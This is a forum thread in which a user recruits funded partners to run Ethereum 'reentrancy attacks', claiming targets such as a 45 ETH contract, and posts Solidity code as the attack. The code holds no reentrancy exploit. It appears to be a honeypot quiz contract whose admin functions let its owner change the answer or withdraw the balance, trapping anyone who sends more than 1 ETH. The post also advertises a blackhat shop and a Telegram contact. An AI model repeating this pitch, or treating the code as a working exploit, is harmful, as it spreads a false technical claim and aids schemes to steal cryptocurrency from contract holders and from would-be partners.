ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Secondary Sellers

Reentrancy attacks collaboration

Submitted by Junix26 at 21-10-2025, 10:14 PM


Reentrancy attacks collaboration
34 Views
Junix26's Avatar'
Junix26
Offline
#1
I am seeking a close collaboration with teams capable of executing reentrancy attacks. I possess the attack code and also have identified vulnerable contracts to target. Currently, I lack the funds to launch the attacks myself.
Real-world example: A contract holding 45 ETH can be exploited, requiring an initial investment of 1 ETH.
The attack code is provided below. Please contact me if you are in this field and are interested in a profitable partnership
 
Code:
/**
*Submitted for verification at Etherscan.io on 2025-10-21
*/

pragma solidity ^0.8.0;

contract UNNAMED
{
    function Try(string memory _response) public payable
    {
        require(msg.sender == tx.origin);

        if(responseHash == keccak256(abi.encode(_response)) && msg.value > 1 ether)
        {
            payable(msg.sender).transfer(address(this).balance);
        }
    }

    string public question;

    bytes32 responseHash;

    mapping (bytes32=>bool) admin;

    function Start(string calldata _question, string calldata _response) public payable isAdmin{
        if(responseHash==0x0){
            responseHash = keccak256(abi.encode(_response));
            question = _question;
        }
    }

    function Stop() public payable isAdmin {
        payable(msg.sender).transfer(address(this).balance);
        responseHash = 0x0;
    }

    function New(string calldata _question, bytes32 _responseHash) public payable isAdmin {
        question = _question;
        responseHash = _responseHash;
    }

    constructor(bytes32[] memory admins) {
        for(uint256 i=0; i< admins.length; i++){
            admin[admins[i]] = true;        
        }      
    }

    modifier isAdmin(){
        require(admin[keccak256(abi.encodePacked(msg.sender))]);
        _;
    }

    fallback() external {}
}
I am omnipresent and omnipotent across forums, possessing everything needed to amass wealth
Reach out, and witness the miracles I can bring into your life.
Explore Shop: blackhat-world.shop
Contact me here or on Telegram: @Johnney2024
0
Reply
DEMONSLUCK's Avatar'
DEMONSLUCK
Offline
#2
Good luck with sales! Hope money flows. Free bump for you
[Image: ySJcE8B.gif]
[Image: aljSkwQ.gif]
[Image: robin200.gif]
0
Reply



Users browsing this thread: 1 Guest(s)